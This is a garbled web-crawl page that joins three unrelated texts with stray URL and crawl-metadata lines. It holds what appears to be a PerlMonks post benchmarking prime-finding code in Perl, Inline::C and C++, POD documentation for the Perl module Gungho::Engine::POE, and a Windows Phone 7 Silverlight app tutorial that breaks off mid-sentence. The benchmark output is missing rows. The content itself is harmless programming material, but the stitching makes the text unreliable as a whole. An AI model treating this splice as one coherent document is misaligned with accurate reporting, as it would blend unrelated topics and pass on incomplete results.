at above page >
http://www.crosswire.org/pipermail/sword-devel/2005-April/022077.html
CC-MAIN-2015-11
refinedweb
407
66.03
- NAME - SYNOPSIS - DESCRIPTION - CONFIGURATION PARAMETERS - POE::Component::Client::HTTP AND DECODED CONTENTS - USING KEEPALIVE - ENVIRONMENT VARIABLES - METHODS - CAVEATS - TODO NAME Gungho::Engine::POE - POE Engine For Gungho SYNOPSIS engine: module: POE config: loop_delay: 5 client: spawn: 2 agent: - AgentName1 - AgentName2 max_size: 16384 follow_redirect: 2 proxy: keepalive: keep_alive: 10 max_open: 200 max_per_host: 20 timeout: 10 dns: # disable: 1 If you want to disable DNS resolution by Gungho DESCRIPTION Gunghog::Engine::POE gives you the full power of POE to Gungho. CONFIGURATION PARAMETERS You can configure the POE engine in many ways. For convenience, all second level parameter names below are written as 'parent.child'. For example, 'client.agent' will actually mean engine: module: POE config: client: agent: XXXXX Or in perl, engine => { module => 'POE', config => { client => { agent => "XXXX" } } } kernel_start If you're embedding Gungho into another POE application, you probably don't want Gungho to call POE::Kernel->run(). This option can control that behavior. If you don't want to start the kernel, then specify 0 for this option. The default is 1. client.loop_delay loop_delay specifies the number of seconds to wait until calling dispatch again. If you feel like Gungho is running slow, try setting this parameter to a smaller amount. Settings this too low will cause your crawler to be constantly looking up for URLs to dispatch instead of fetching the URLs. Alays try to time the requests before going to extremes with this setting. client.spawn spawn specifies the number of POE::Component::Client::HTTP sessions to start. This will greatly affect your fetching speed, as PoCo::Client::HTTP tends to start jamming up after a certain number of requests have been pushed onto its queue. If you feel like all of your other settings are correct but the actual HTTP fetch is taking too long, try setting this number to something higher. By default this is set to 2. keepalive.keep_alive Specifies the number of seconds to keep a connection in the Keepalive connection manager. This is an important option to tweak if you're using proxies. Even though you might be accessing thousands of different URLs, POE will think that you are in fact trying to connect to the same host because you're accessing the same proxy. Turn this to 0 if you are using a proxy. POE::Component::Client::HTTP AND DECODED CONTENTS Since version 0.80, POE::Component::Client::HTTP silently decodes the content of an HTTP response. This means that, even when the HTTP header states Content-Type: text/html; charset=euc-jp Your content grabbed via $response->content() will be in decode Perl unicode. This is a side-effect from POE::Component::Client::HTTP trying to handle Content-Encoding for us, and HTTP::Request also trying to be clever. We have devised workarounds for this. You can either set the following variables in your environment (before Gunghoe::Engine::POE is loaded) to enable the workarounds: GUNGHO_ENGINE_POE_SKIP_DECODE_CONTENT = 1 # or GUNGHO_ENGINE_POE_FORCE_ENCODE_CONTENT = 1 See ENVIRONMENT VARIABLES for details USING KEEPALIVE Gungho::Engine::POE uses PoCo::Client::Keepalive to control the connections. For the most part this has no visible effect on the user, but the "timeout" parameter dictate exactly how long the component waits for a new connection which means that, after finishing to fetch all the requests the engine waits for that amount of time before terminating. This is NORMAL. ENVIRONMENT VARIABLES GUNGHO_ENGINE_POE_SKIP_DECODE_CONTENT When set to a non-null value, this will install a new subroutine in HTTP::Response's namespace, and will circumvent HTTP::Response to decode its content by explicitly passing charset = 'none' to HTTP::Response's decoded_content(). This workaround is ENABLED by default. GUNGHO_ENGINE_POE_FORCE_ENCODE_CONTENT When set to a non-null value, this will re-encode the content back to what the Content-Type header specified the charset to be. By default this option is disabled. METHODS setup sets up the engine. run Instantiates a PoCo::Client::HTTP session and a main session that handles the main control. stop Shutsdown the engine send_request($request) Sends a request to the http client CAVEATS The POE engine supports multiple values in the user-agent header, but this is an exception that other engines don't support. Please use define your agent strings in the top level config: user_agent: my_user_agent engine: module: POE ... If you don't do this, components such as RobotRules won't work properly TODO Xango, Gungho's predecessor, tried really hard to overcome one of my pet-peeves with PoCo::Client::HTTP -- which is that, while it can handle hundreds and thousands of requests, all the requests are unnecessarily stored on memory. Xango tried to solve this, but it ended up bloating the software. We may try to tackle this later.
https://metacpan.org/pod/Gungho::Engine::POE
CC-MAIN-2015-11
refinedweb
783
52.9
#include <wx/aboutdlg.h> wxAboutDialogInfo contains information shown in the standard About dialog displayed by the wxAboutBox() function. This class contains the general information about the program, such as wxArrayString and can be either set entirely at once using wxAboutDialogInfo::SetDevelopers and similar functions or built one by one using wxAboutDialogInfo::AddDeveloper etc. Please also notice that while all the main platforms have the native implementation of the about dialog, they are often more limited than the generic version provided by wxWidgets and so the generic version is used if wxAbout. Example of usage: Default constructor leaves all fields are initially uninitialized, in general you should call at least SetVersion(), SetCopyright() and SetDescription(). Adds an artist name to be shown in the program credits. Adds a developer name to be shown in the program credits. Adds a documentation writer name to be shown in the program credits. Adds a translator name to be shown in the program credits. Notice that if no translator names are specified explicitly, wxAboutBox() will try to use the translation of the string translator-credits from the currently used message catalog – this can be used to show just the name of the translator of the program in the current language. Returns an array of the artist strings set in the dialog info. Get the copyright string. Get the description string. Returns an array of the developer strings set in the dialog info. Returns an array of the writer strings set in the dialog info. Returns the licence string. Return the long version string if set. Returns an array of the translator strings set in the dialog info. Return the short version string. Returns the description of the website URL set for the dialog. Returns the website URL set for the dialog. Returns true if artists have been set in the dialog info. Returns true if a copyright string has been specified. Returns true if a description string has been specified. Returns true if developers have been set in the dialog info. Returns true if writers have been set in the dialog info. Returns true if an icon has been set for the about dialog. Returns true if the licence string has been set. Returns true if translators have been set in the dialog info. Returns true if the website info has been set. Sets the list of artists to be shown in the program credits. Set the short string containing the program copyright information. Notice that any occurrences of "(C)" in copyright will be replaced by the copyright symbol (circled C) automatically, which means that you can avoid using this symbol in the program source code which can be problematic, Set brief, but possibly multiline, description of the program. Set the list of developers of the program. Set the list of documentation writers.. This is the same as SetLicence(). Set the name of the program. If this method is not called, the string returned by wxApp::GetAppName will be shown in the dialog. Set the list of translators. Please see AddTranslator() for additional discussion. Set the version of the program. The word "version" shouldn't be included in version. Example version values: "1.2" and "RC2". In about dialogs with more space set aside for version information, longVersion is used. Example longVersion values: "Version 1.2" and "Release Candidate 2". If version is non-empty but longVersion is empty, a long version is constructed automatically, using version (by simply prepending "Version " to version). The generic about dialog and native GTK+ dialog use version only, as a suffix to the program name. The native MSW and macOS about dialogs use the long version..
https://docs.wxwidgets.org/3.1.5/classwx_about_dialog_info.html
CC-MAIN-2021-31
refinedweb
606
59.09
First solution in Clear category for I Love Python! by spyraklas1 def i_love_python(): """ Coming from a beginner programmer's perspective: I love Python because it is a simple enough programming language that beginners can quickly get up and running with. It allows for writing full, complicated programs, with very simple building parts. It's also great for forgetting the details, and focusing on the more important concepts and ideas of computer science. (I've heard that other languages such as C++/Java can get you lost very quickly. While I don't fully know how Python compares to other programming languages in other respects, I know that it is a wonderful language that quickly and elegantly shows you the magic of computers and of programming. That's why I love Python! """ return "I love Python!" if __name__ == '__main__': #These "asserts" using only for self-checking and not necessary for auto-testing assert i_love_python() == "I love Python!" July 15, 2015 Forum Price Global Activity ClassRoom Manager Leaderboard Coding games Python programming for beginners
https://py.checkio.org/mission/i-love-python/publications/spyraklas1/python-3/first/share/a7d483f79e14eab54afc3ba10c9a3feb/
CC-MAIN-2021-04
refinedweb
172
54.83
On Sun, Aug 12, 2001 at 11:26:56PM -0400, Andrew Kuchling wrote: >I've just finished a first draft of a simple specification for marking >book reviews on Web pages. Thinking some more about my earlier book review posting and after some comments from Eugene Kim, some tweaking of the declaration format seems needed. I've come up with 3 candidate approaches: everything in one element, everything in element and attribute content, and elements with text content, and would like to hear opinions about it. (Aside: I'm posting this to the XML-SIG because it's really the only list I've got. Can someone point me toward a mailing list where people hang out to design XML applications? xml-dev seems more concerned with higher-level questions such as "which schema language? DTDs: threat or menace?" than with applications; comp.text.xml is full of newbies asking questions. Any suggestions, or should I continue to use the XML-SIG?) All of the possible formats would require a namespace declaration for the 'review' namespace; one possibility is as follows: <html xmlns: Format 1: one element with attributes. <p><cite>Amazing Title</cite>, Mark Twain and Dante Aligheri<br/> <review:review Here is the text of my review. <em>It can use HTML.</em> </review:review> Handling multiple authors is hard and likely to be unreliable. (Split the attribute value at the commas? What if a book is written by "George Gordon, Lord Byron", who is one person?) Format 2: several elements with attributes. <p><cite>Amazing Title</cite>, Mark Twain and Dante Aligheri <br/> <review:review <review:author <review:author Here is the text of my review. <em>It can use HTML.</em> </review:review> We could add additional attributes to authors later (an ID, date of birth/death, &c). And should names be "last, first" or "first last", or two separate attributes? I lean toward "first last"; two attributes would be more verbose and less readable. (Maybe as an option?) Format 3: use text content. <p> <review:review <cite><review:title>Amazing Title</review:title></cite>, <review:author>Mark Twain</review:author> and <review:author>Dante Aligheri</review:author> <br/> Here is the text of my review. <em>It can use HTML.</em> </review:review> Old user agents should just display the text, and new XHTML-aware agents could display the author and title specially. Most verbose form, though. Users could put HTML in the title and author; I suspect that's a bug and not a feature. Also, note that the <cite> element surrounding the title and the initial <br/> would have to be cleaned up, because they aren't really part of the review text. Does anyone have suggestions about which form would be preferable? I think I'm leaning toward #2 as the best trade-off of simplicity and markup precision. --amk
https://mail.python.org/pipermail/xml-sig/2001-August/005927.html
CC-MAIN-2018-51
refinedweb
478
66.44
I love it when a plan comes together. I set out to figure out how to use Inline::C today, and thought I'd share the experience from the perspective of someone who was using Inline::C for the first time. The Inline::CPP experience: Before I get into discussing Inline::C, I should mention that I really set out to explore Inline::CPP, but was disappointed to find that building it on my Windows Vista system with Strawberry Perl v5.12, as well as my Ubuntu Linux 11.10 system with Perl v5.14 proved more difficult than I cared to deal with at this time. The CPAN Testers Matrix shows it pretty much failing across the board for the versions of Perl I'm using on the OS's I have available at my fingertips. The CPAN Testers Reports summary page also shows v0.25 not passing on Win32 Perl 5.12.3 and just about any version of Linux. Given it hasn't been updated in a number of years, it seems that's probably a dead end. But if others have been successful, I'd love to hear about it. Back to Inline::C. Installation was straightforward. On both Windows with Strawberry Perl, and Linux it was just a matter of invoking cpan Inline::C. The rest went like clockwork. That's nice. The documentation for Inline::C also refers the reader to Inline::C-Cookbook. Anyone interested in getting some use out of this module should read both documents. The cookbook really helped to illustrate what is discussed in (or left out of) the documents for Inline::C. In particular, I was glad to find that I didn't have to jump through big hoops to pass a list back to Perl. Minor hoops yes, but I was expecting to have to build up a linked list or something by hand. Instead, the macros provided give access to Perl's lists. Observe the following example from the Inline::C-Cookbook: perl -e 'use Inline C=>q{void greet(){printf("Hello, world\n");}};gree +t' [download] Now that looks promising... Next I pulled up an old benchmark test I had in a trivia folder. I had already written two of the benchmark subs I wanted to compare with Inline::C. The first was a pure Perl Perl implementation of a pretty straightforward subroutine that searches for primes in the first 0 .. n integers. The second sub was a Perl wrapper around a system call (via open to a pipe). The system call invokes a compiled C++ implementation of the same algorithm as the one used in the pure Perl subroutine. I had hoped to employ that same C++ code in an Inline::CPP test, but since I couldn't get that to install I re-implemented the same algorithm in C using the Inline::C hooks for Perl. Here's the code, followed by a sample run: use strict; use warnings; use autodie; use v5.12; use Benchmark qw/cmpthese/; use Test::More tests => 3; use Inline 'C'; use constant TOP => 150000; use constant TIME => 5; is( scalar @{ basic_perl( 3571 ) }, 500, "The first 500 primes are found from 2 to 3571." ); is_deeply( external_cpp(), basic_perl(), "external_cpp() function gives same results as basic_perl()." ); is_deeply( inline_c(), basic_perl(), "inline_c() function gives same results as basic_perl()." ); note "\nComparing basic_perl(), external_cpp(), and inline_c() for\n", TIME, " seconds searching ", TOP, " integers.\n\n"; cmpthese( - TIME, { basic_perl => \&basic_perl, external_cpp => \&external_cpp, inline_c => \&inline_c, }, ); note "\nI love it when a plan comes together.\n\n"; # The pure Perl version. sub basic_perl { my $top = $_[0] // TOP; my @primes = ( 2 ); BASIC_OUTER: for( my $i = 3; $i <= $top; $i += 2 ) { my $sqrt_i = sqrt( $i ); for( my $j = 3; $j <= $sqrt_i; $j += 2 ) { next BASIC_OUTER unless $i % $j; } push @primes, $i; } return \@primes; } # A wrapper around the external executable compiled in C++. sub external_cpp { my $top = TOP; open my $fh, '-|', "primes.exe $top"; chomp( my @primes = <$fh> ); close $fh; return \@primes; } # To be consistent: a wrapper around the Inline C version. sub inline_c{ my $top = TOP; my @primes = inline_c_primes( $top ); return \@primes; } __END__ // Reference only (not used by Inline::C ) // The source code, "primes.cpp" for "primes.exe", // used by external_cpp(). #include <iostream> #include <cmath> #include <cstdlib> #include <vector> #include <algorithm> using namespace std; vector<int> get_primes( int search_to ); void print( int value ); // The first 500 primes are found from 2 to 3571. const int TOP = 3571; // int main( int argc, char *argv[] ) { int search_to = ( argc > 1 ) ? atoi(argv[1]) : TOP; vector<int> primes = get_primes( search_to ); for_each( primes.begin(), primes.end(), print ); return 0; } vector<int> get_primes( int search_to ) { vector<int> primes; primes.push_back( 2 ); for( int i = 3; i <= search_to; i += 2 ) { int sqrt_i = sqrt( i ); for( int j = 3; j <= sqrt_i; j += 2 ) { if( i % j == 0 ) goto SKIP; } primes.push_back( i ); SKIP: {}; } return primes; } void print ( int value ) { cout << value << endl; } __C__ # Here is the C code that is compiled by Inline::C #include "math.h" void inline_c_primes( int search_to ) { Inline_Stack_Vars; Inline_Stack_Reset; Inline_Stack_Push(sv_2mortal(newSViv(2))); int i; for( i = 3; i <= search_to; i+=2 ) { int sqrt_i = sqrt( i ); int qualifies = 1; int j; for( j = 3; ( j <= sqrt_i ) && ( qualifies==1 ); j += 2 ) { if( i % j == 0 ) { qualifies = 0; } } if( qualifies == 1 ) { Inline_Stack_Push(sv_2mortal(newSViv(i))); } } Inline_Stack_Done; } # Cross your fingers and hope for the best! [download] ...the sample run (Windows)... 1.27/s -- -94% -98% external_cpp 20.0/s 1467% -- -66% inline_c 59.3/s 4555% 197% -- # # I love it when a plan comes together. # [download] A sample run from my Linux system: 2.37/s -- -91% -97% external_cpp 25.3/s 969% -- -67% inline_c 76.0/s 3106% 200% -- # # I love it when a plan comes together. # [download] It took a little time getting used to debugging under Inline::C. But the error messages are about as informative as the C compiler would give on its own, if not a little better. For one thing, compile time errors get printed into a log file in the build directory, and the error messages that dump to the screen indicate the path to where the full error message dump resides. That's nice.. Open it up in an editor that shows line numbers and the error messages will make more sense. But don't bother editing the .xs file. Changes need to be made to the C code within the Perl source file. (I know this is common sense, but with several editors opened it's easy to mistakenly start editing the .xs file just because that's where you're crossreferencing the error line numbers.) Now for the fun: As the benchmark shows, the Inline::C screams by comparison to the other methods. Of course dropping into C or C++ is generally a big pain in the neck, but when performance counts, it doesn't disappoint. Another thing to notice is that the external system call method is significantly slower than the inline method. Earlier I had a benchmark where I was doing an external call to essentially a "no-op", and it's pretty obvious that the work being done in an external call doesn't come for free. But even with that extra work, the external call method is an order of magnitude faster than the pure Perl subroutine. Pros and cons of each: The benchmark results speak for themselves; if speed is what matters, the Inline::C method wins. It's not surprising that the Perl sub was the easiest to implement, followed by the external system call (which could be in any language, without worrying about Perl's C macros for passing data around), followed by the Inline::C method, which was the most trouble to work out. I've always sort of avoided working with XS because I didn't see a lot of need. And in fact, I've gotten by just fine without Inline::C in the past as well. But it turns out that using Inline::C is fairly simple. I don't think I'll be as pleasantly surprised when I get around to tackling full blown XS. This, however, was a pretty positive experience. I hope others will be motivated to give it a try too. Update: Added readmore tags after the node got FrontPaged, to reduce FP clutter. Tinkered with formatting. Dave In reply to Exploring Inline::C (Generating primes).
http://www.perlmonks.org/?parent=933587;node_id=3333
CC-MAIN-2016-40
refinedweb
1,395
72.26
zest.releaser 5.6 and Landscape: Compatibility / Dependencies zest.releaser works on Python 2.7. Python 2.6 is not officially supported anymore since version 4.0: it may still work, but we are no longer testing against it. Python 3.3+ is supported. To be sure: the packages that you release with zest.releaser may very well work on other Python versions: that totally depends on your package. We depend on: - setuptools for the entrypoint hooks that we offer. - colorama for colorized output (some errors printed in red). - six for python2/python3 compatibility. Since version 4.0 there is a recommended extra that you can get by installing zest.releaser[recommended] instead of zest.releaser. It contains a few trusted add-ons that we feel are useful for the great majority of zest.releaser users: - wheel for creating a Python wheel that we upload to PyPI next to the standard source distribution. Wheels are the new Python package format.. - check-manifest checks your MANIFEST.in file for completeness, or tells you that you need such a file. It basically checks if all version controlled files are ending up the the distribution that we will upload. This may avoid ‘brown bag’ releases that are missing files. - pyroma checks if the package follows best practices of Python packaging. Mostly it performs checks on the setup.py file, like checking for Python version classifiers. - chardet, the universal character encoding detector. To do the right thing in case your readme or changelog is in a non-utf-8 character set. - readme to check your long description in the same way as pypi does. No more unformatted restructured text on your pypi page just because there was a small error somewhere. Handy. - twine for secure uploading via https to pypi. Plain setuptools doesn’t support this. Installation Just a simple pip install zest.releaser or easy_install zest.releaser is enough. If you want the recommended extra utilities, do a pip install zest.releaser[recommended]. Alternatively, buildout users can install zest.releaser as part of a specific project’s buildout, by having a buildout configuration such as: [buildout] parts = scripts [scripts] recipe = zc.recipe.egg eggs = zest.releaser[recommended] Version control systems: svn, hg, git, bzr Of course you must have a version control system installed. zest.releaser currently supports: - Subversion (svn). - Mercurial (hg). - Git (git). - Git-svn. -. - Richard Mitchell (Isotoma) added Python 3 support. Changelog for zest.releaser 5.6 (2015-09-23) - Add support for PyPy. [jamadden] 5.5 (2015-09-05) - The bin/longtest command adds the correct utf-8 character encoding hint to the resulting html so that non-ascii long descriptions are properly rendered in all browsers. [reinout] 5.4 (2015-08-28) - Requiring at least version 0.6 of the (optional, btw) readme package. The API of readme changed slightly. Only needed when you want to check your package’s long description with bin/longtest. [reinout] 5.3 (2015-08-21) - Fixed typo in svn command to show the changelog since the last tag. [awello] 5.2 (2015-07-27) - When we find no version control in the current directory, look a few directories up. When looking for version and history files, we look in the current directory and its sub directories, and not in the repository root. After making a tag checkout, we change directory to the same relative path that we were in before. You can use this when you want to release a Python package that is in a sub directory of the repository. When we detect this, we first offer to change to the root directory of the repository. [maurits] - Write file with the same encoding that we used for reading them. Issue #109. [maurits] 5.1 (2015-06-11) - Fix writing history/changelog file with non-ascii. Issue #109. [maurits] - Release zest.releaser as universal wheel, so one wheel for Python 2 and 3. As usual, we release it also as a source distribution. [maurits] - Regard “Skipping installation of __init__.py (namespace package)” as warning, printing it in magenta. This can happen when creating a wheel. Issue #108. [maurits] 5.0 (2015-06-05) - Python 3 support. [mitchellrj] - Use the same readme library that PyPI uses to parse long descriptions when we test and render them. [mitchellrj] 4.0 (2015-05-21) - Try not to treat warnings as errors. [maurits] - Allow retrying some commands when there is an error. Currently only for commands that talk to PyPI or another package index. We ask the user if she wants to retry: Yes, no, quit. [maurits] - Added support for twine. If the twine command is available, it is used for uploading to PyPI. It is installed automatically if you use the zest.releaser[recommended] extra. Note that if the twine command is not available, you may need to change your system PATH or need to install twine explicitly. This seems more needed when using zc.buildout than when using pip. Added releaser.before_upload entry point. Issue #59. [maurits] - Added check-manifest and pyroma to the recommended extra. Issue #49. [maurits] - Python 2.6 not officially supported anymore. It may still work, but we are no longer testing against it. [maurits] - Do not accept y or n as answer for a new version. [maurits] - Use colorama to output errors in red. Issue #86 [maurits] - Show errors when uploading to PyPI. They were unintentionally swallowed before, so you did not notice when an upload failed. Issue #84. [maurits] - Warn when between the last postrelease and a new prerelease no changelog entry has been added. ‘- Nothing changed yet’ would still be in there. Issue #26. [maurits] - Remove code for support of collective.sdist. That package was a backport from distutils for Python 2.5 and earlier, which we do not support. [maurits] - Add optional support for uploading Python wheels. Use the new zest.releaser[recommended] extra, or run pip install wheel yourself next to zest.releaser.. Issue #55 [maurits] - Optionally add extra text to commit messages. This can be used to avoid running Travis Continuous Integration builds. See. To activate this, add extra-message = [ci skip] to a [zest.releaser] section in the setup.cfg of your package, or your global ~/.pypirc. Or add your favorite geeky quotes there. [maurits] - Fix a random test failure on Travis CI, by resetting AUTO_RESPONSE. [maurits] - Added clarification to logging: making an sdist/wheel now says that it is being created in a temp folder. Fixes #61. [reinout] 3.56 (2015-03-18) - No need anymore to force .zip for sdist. Issue #76 [reinout] - Still read setup.cfg even if ~/.pypirc is wrong or missing. Issue #74 [tomviner] 3.55 (2015-02-03) - Experimental work to ignore setuptools’ stderr output. This might help with some of the version warnings, which can break zest.releaser’s output parsing. [reinout] - Fix for #72. Grabbing the version from the setup.py on windows can fail with an “Invalid Signature” error because setuptools cannot find the crypto dll. Fixed by making sure setuptools gets the full os.environ including the SYSTEMROOT variable. [codewarrior0] 3.54 (2014-12-29) - Blacklisting debian/changelog when searching for changelog-like filenames as it gets picked in favour of docs/changelog.rst. The debian one is by definition unreadable for us. 3.53.2 (2014-11-21) - Additional fix to 3.53: version.rst (and .md) also needed to be looked up in a second spot. 3.53 (2014-11-10) - Also allowing .md extension in addition to .rst/.txt/.markdown for CHANGES.txt. [reinout] - Similarly, version.txt (if you use that for non-setup.py-projects) can now be version.rst or .md/.markdown, too. [reinout] 3.52 (2014-07-17) - Fixed “longtest” command when run with a python without setuptools installed. Similar fix to the one in 3.51. See [reinout] 3.51 (2014-07-17) - When calling python setup.py use the same PYTHONPATH environment as the script has. [maurits] 3.50 (2014-01-16) - Changed command “hg manifest” to “hg locate” to list files in Mercurial. The former prints out file permissions along with the file name, causing a bug. [rafaelbco] 3.49 (2013-12-06) - Support git-svn checkouts with the default “origin/” prefix. [kuno] 3.48 (2013-11-26) - When using git, checkout submodules. [dnozay] 3.47 (2013-09-25) - Always create an egg (sdist), even when there is no proper pypi configuration file. This helps plugins that use our entry points. Fixes [maurits]] - Downloads (All Versions): - 171 downloads in the last day - 3085 downloads in the last week - 11170 downloads in the last month - Author: Reinout van Rees - Keywords: releasing,packaging,pypi - License: GPL - Categories - Development Status :: 6 - Mature - Intended Audience :: Developers - License :: OSI Approved :: GNU General Public License (GPL) - Programming Language :: Python - Programming Language :: Python :: 2 - Programming Language :: Python :: 2.7 - Programming Language :: Python :: 3 - Programming Language :: Python :: 3.3 - Programming Language :: Python :: 3.4 - Programming Language :: Python :: Implementation :: CPython - Programming Language :: Python :: Implementation :: PyPy - Topic :: Software Development :: Libraries :: Python Modules - Requires Distributions - wheel; extra == 'test' - zope.testrunner; extra == 'test' - z3c.testsetup (>=0.8.4); extra == 'test' - twine; extra == 'recommended' - wheel; extra == 'recommended' - readme (>=0.6); extra == 'recommended' - pyroma; extra == 'recommended' - check-manifest; extra == 'recommended' - chardet; extra == 'recommended' - six - colorama - setuptools - Package Index Owner: markvl, jladage, reinout, maurits - DOAP record: zest.releaser-5.6.xml
https://pypi.python.org/pypi/zest.releaser
CC-MAIN-2015-40
refinedweb
1,551
61.33
i am supposed to write a program to display the status of an order for a company. "The program should have a function that asks for the following data: - The number of spools ordered. - The number of spools in stock. - If there are special shipping and handling charges. The gathered data should be passed as arguments to another function that displays blablabla" my question is how does the first function return all three pieces of information to main so it can be passed to the second function? i just made three separate functions for it and it works but it seemed like the book implied one function should do all that work. fyi structs and classes have not been covered yet so please dont reply with an answer in that form of solution. here is my code: (not perfected yet with calculations but just want answer to my question) Code:#include <iostream> #include <iomanip> using namespace std; void getOrdered(double &); void getStock(double &); double specialShipping(); void displayData(double, double, double); int main() { double ordered, stock; double shipping; getOrdered(ordered); getStock(stock); shipping = specialShipping(); displayData(ordered, stock, shipping); return 0; } void getOrdered(double &ord) { cout << "Enter the number of spools ordered: "; cin >> ord; } void getStock(double &st) { cout << "Enter the number of spools in stock: "; cin >> st; } double specialShipping() { char choice; double shipping = 0; do { cout << "Are there any special shipping options? (Y or N): "; cin >> choice; }while(choice != 'y' && choice != 'Y' && choice != 'n' && choice != 'N'); if (choice == 'y' || choice == 'Y') { cout << "Enter the shipping in dollars per spool: "; cin >> shipping; } else if (choice == 'n' || choice == 'N') { shipping = 10; } return shipping; } void displayData(double ord, double st, double ship) { if (ord > st) { cout << "Number of spools on backorder: " << ord - st << endl; } else cout << "Number of spools ready to ship: " << ord << endl; cout << "Subtotal of portion ready to ship: $" << fixed << setprecision(2) << (ord * 100) << endl; cout << "Total shipping and handling: $" << fixed << setprecision(2) << ship << endl; cout << "Total: $" << fixed << setprecision(2) << (ord*100) + ship << endl; }
http://cboard.cprogramming.com/cplusplus-programming/118716-returning-multiple-values-function.html
CC-MAIN-2015-48
refinedweb
332
56.22
This seems so basic to have some sort of run time clock on an arduino device. Why is this so difficult? sprintf(tweet,"%2.2d:%2.2d:%2.2d Sensor Reading S1=%e S2=%e", hour(), minute(), second(), (float)temp_f, (float)real_humidity); #include <Time.h> setTime(hr,min,sec,day,month,yr); setTime(10,55,0,22,11,2010); This seems so basic to have some sort of run time clock on an arduino device. Why is this so difficult? void setup(){ Serial.begin(9600); // Open serial connection to report values to host Serial.println("Starting up");}void loop(){ char *s; s = TimeToString(millis()/1000); Serial.println(s); delay(456);}// t is time in seconds = millis()/1000;char * TimeToString(unsigned long t){ static char str[12]; long h = t / 3600; t = t % 3600; int m = t / 60; int s = t % 60; sprintf(str, "%04ld:%02d:%02d", h, m, s); return str;} delay(456); 456? What significance does that value have? Because you mess around. Back to your original code sample, when applying the hint you got about the Time library, you might get something like this:
http://forum.arduino.cc/index.php?topic=45293.msg328366
CC-MAIN-2015-27
refinedweb
186
67.76
As of the publication date of this article, Windows Phone 7 devices are becoming available in Europe and will hit North America on November 8th 2010 and Microsoft is gradually opening up the application submission process to registered developers. Microsoft expects as many as 1,000 applications available at launch. Will one of those applications be yours? This article takes you through the process of getting the tools, registering as a developer, building a basic Silverlight application for Windows Phone 7 (©Copyright Colin Melia 2010), and submitting it to the marketplace. Getting Started - Application Platform The available developer tools allow you to build Silverlight and XNA software for Windows Phone 7. For an introduction to the platform see my previous article. In this article, I’ll be showing you how to build a Silverlight application. The Hub for Applications Just before device launch Microsoft transformed the Windows Phone 7 developer portal and combined it with the Xbox Creator’s Club, with everything now available in one place called the App Hub. Get and Install the Tools The developer tools for developing applications for Windows Phone 7 are completely FREE. You can find the installer by following links from the App Hub, or you can find the RTW version here. To install the RTW (‘Released To the Web’). You be prompted to Save or Open the installer… The installer downloads and then installs several tools in one process. The download page also includes access to an ISO image of all the components if you will be installing on a machine without a network connection.. Before installing the RTW version of the tools, be sure to first uninstall any pre-release version of the toolset in one go by uninstalling the item named, “Microsoft Windows Phone Developer Tools…” under Control Panel. Become a subscribing App Hub member Before you start building software, it’s a good idea to become a subscribing member on the App Hub as this can take a few days if you haven’t done it already. Being a subscribing member costs US$99 per year (varying by country) and permits you to sell applications for Windows Phone 7 (as well as Xbox LIVE Indie Games). You can also publish 5 free Windows Phone 7 applications a year (with additional ones costing US$20 each). If you want to build applications for yourself, but don’t want to sell them, you may still need to subscribe to be able to deploy your applications on to your phone – we will discuss this later in the article... You join as either an individual or as a business. To join and subscribe you’ll need a Live ID, contact information, credit card information and proof of identity (government issued ID for individuals and government registration numbers for businesses). As part of the process of joining (over a few days), you will be asked to verify the email address you entered and you will be asked to provide applicable proof of identity (which may require you to fax documents). A security certificate partner working with Microsoft will handle part of the process and create a digital certificate used by the marketplace to sign your submitted applications. You can see a walkthrough of the process here. Once you are set up you’ll be able to go the App Hub and select “windows phone”… To get paid (if you submit applications to sell that aren’t free) you will also then need to provide bank account information for direct deposit. If you are outside of the US, you may also need to submit US Government paperwork to Microsoft to ensure tax is appropriately handled. So you are ready to submit an application… Build an Application We’re going to step through the process of creating an application that simulates the rolling of a die (that’s singular noun of the plural noun ‘dice’ in case you didn’t know). Building Blocks Launch Visual Studio 2010 Express for Windows Phone or Visual Studio 2010 Professional (or higher). Go to File->New Project, select the “Silverlight for Windows Phone” template, select “Windows Phone Application”, enter a Name of “DieApp” as shown… …and click OK. The project will open up with a window showing a designer and XML-like editor but we’re going to come back to that. We are going to build the application using the MVVM (Model-View-ViewModel) design pattern and for that we need a little extra help using the MVVM Light components, available from GalaSoft here. Look for the download link for the latest version of the Windows Phone 7 binaries. I would hope that Microsoft incorporates this into future tools releases. Unzip the files to a location you remember. Next, go to the Solution Explorer window (which can be found under the View menu if not visible), right-click on “DieApp” (not “Solution ‘DieApp’) and select Add -> Class as shown. Type the Name “DieVM.cs” and click OK. Again, right-click DieApp in Solution Explorer & select Add Reference as shown… Navigate to the MVVM Light files you downloaded and go down to the Binaries folder for WP7. Select all 3 files (using CTRL or SHIFT)… Click OK. Add the following using statements below the ones already in DieVM.cs: using System.ComponentModel; using System.Windows.Threading; using GalaSoft.MvvmLight.Command; Replace the empty class code (inside the Namespace {} brackets) with this code: public class DieVM : INotifyPropertyChanged { private DispatcherTimer _td = null; private Random _rng = null; private int _flipcount; private int _flipmax; public DieVM() { _rng = new Random(DateTime.UtcNow.Millisecond); _td = new DispatcherTimer(); _td.Interval = new TimeSpan(0, 0, 0, 0, 150); _td.Tick += new EventHandler(_td_Tick); _rollcommand = new RelayCommand(() => Roll()); } private RelayCommand _rollcommand; public RelayCommand RollCommand { get { return _rollcommand; } } private int _value = 1; public int Value { get { return _value; } set { _value = value; Notify("Value"); } } private Boolean _isrolling = false; public Boolean IsRolling { get { return _isrolling; } private set { _isrolling = value; Notify("IsRolling"); } } public void Roll() { if (IsRolling) return; IsRolling = true; _flipmax = _rng.Next(8) + 4; _flipcount = 0; _td.Start(); } void _td_Tick(object sender, EventArgs e) { int newvalue; while ((newvalue = _rng.Next(6) + 1) == Value) ; Value = newvalue; if (++_flipcount == _flipmax) { _td.Stop(); IsRolling = false; } } #region INotifyPropertyChanged Members private void Notify(String info) { if (PropertyChanged != null) PropertyChanged(this, new PropertyChangedEventArgs(info)); } public event PropertyChangedEventHandler PropertyChanged; #endregion } The class includes capabilities which will become apparent later on. Note that it: - has a Value property to represent the current value of a die - uses a DispatchTimer to enable the value to change every 150ms when the die is ‘rolled’ - uses a random number generating class for the next value and the number of value changes in a roll - supports INotifyPropertyChanged (explained later) that will enable our UI to update when the value updates Go to the Build menu and choose Build Solution. You should get a “Build succeeded” message in the bottom left corner. Add some dots Now for something visible. Go to MainPage.xaml (by clicking on the Tab showing with that name). What you are seeing is XAML (eXtensible Application Markup Language) which is XML used to declare a tree of objects (mostly visual elements). Roughly speaking, at runtime, the XML element names are used as Type name to instantiate .NET objects (in a hierarchy) and the XML attributes are used to set the properties on the objects. Delete the XAML shown here from MainPage.xaml – we don’t need it for our UI – and some text will disappear from the design 